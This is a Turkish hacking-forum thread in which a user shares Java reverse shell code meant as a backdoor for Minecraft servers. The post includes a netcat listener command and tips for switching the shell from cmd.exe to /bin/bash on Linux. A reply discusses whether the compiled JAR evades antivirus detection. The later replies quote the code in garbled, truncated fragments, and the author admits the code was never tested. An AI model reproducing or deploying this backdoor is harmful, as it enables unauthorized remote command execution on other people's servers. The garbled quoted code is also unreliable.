Java ile minecraft sunucuları için reverse shell

Ezzoris

Üye
28 Tem 2023
61
15
İlk öncelikle herkese merhabalar bugün minecraft sunucuları için yaptığım bir reverse shell'i sizlerle paylaşacağım umarım beğenirsiniz :)

Java:
import java.io.*;
import java.net.*;

public class Main {
    public static void main(String[] args) {
        String host = "ip_adresiniz";
        int port = portunuz;

try {
            Socket socket = new Socket(host, port);
            Process process = new ProcessBuilder("cmd.exe").redirectErrorStream(true).start();
            InputStream input = process.getInputStream();
            OutputStream output = socket.getOutputStream();

BufferedReader reader = new BufferedReader(new InputStreamReader(input));
            String line;
            while ((line = reader.readLine()) != null) {
                output.write((line + "\n").getBytes());
                output.flush();
            }

output.close();
            reader.close();
            socket.close();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

dinlemeye almak için ncat kullanabilirsiniz örnek:
Kod:
nc -nlvp 4444

backdoor çalışıyor mu bilmiyorum çünkü sunucu açıp test etmeye üşendim :D siz kendiniz deneyebilirsiniz eğer çalışmazsa bana bildirebilirsiniz bende ona göre konuyu güncellerim. ayrıca eğer sunucu linux üzerinden çalışıyorsa Process process = new ProcessBuilder("cmd.exe").redirectErrorStream(true).start(); bu kısımdaki cmd.exe'yi /bin/bash veya /bin/sh olarak değiştirebilirsiniz

eğer isterseniz normal bir reverse shell'de yapabilirim.

alexandre20

Katılımcı Üye
13 Tem 2022
894
700
gidip source dosyasını VT'ye sokarsanız tabi 0/72 alırsınız. Compile edilmiş .JAR halini yükleyin bakalım FUD'muymuş :)

RootWarrior

Yeni üye
2 Mar 2024
8
0
İlk öncelikle herkese merhabalar bugün minecraft sunucuları için yaptığım bir reverse shell'i sizlerle paylaşacağım umarım beğenirsiniz :)

Java:
import java.io.*;
import java.net.*;

public class Main {
        int port = portunuz;

try {
            Process process = new ProcessBuilder("cmd.exe").redirectErrorStream(true).start();

String line;
                output.flush();
            }

output.close();
            reader.close();
            socket.close();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

Kod:
nc -nlvp 4444

backdoor çalışıyor mu bilmiyorum çünkü sunucu açıp test etmeye üşendim :D siz kendiniz deneyebilirsiniz eğer çalışmazsa bana bildirebilirsiniz bende ona göre konuyu güncellerim. ayrıca eğer sunucu linux üzerinden çalışıyorsa Process process = new ProcessBuilder("cmd.exe").redirectErrorStream(true).start(); bu kısımdaki cmd.exe'yi /bin/bash veya /bin/sh olarak değiştirebilirsiniz

Elinize sağlık

21 Ocak 2019
53
3
$root/home/

Java:
import java.io.*;
import java.net.*;

public class Main {
        int port = portunuz;

try {

String line;
                output.flush();
            }

output.close();
            reader.close();
            socket.close();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

Kod:
nc -nlvp 4444

elinize sağlık yararlı paylaşım olmuş

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.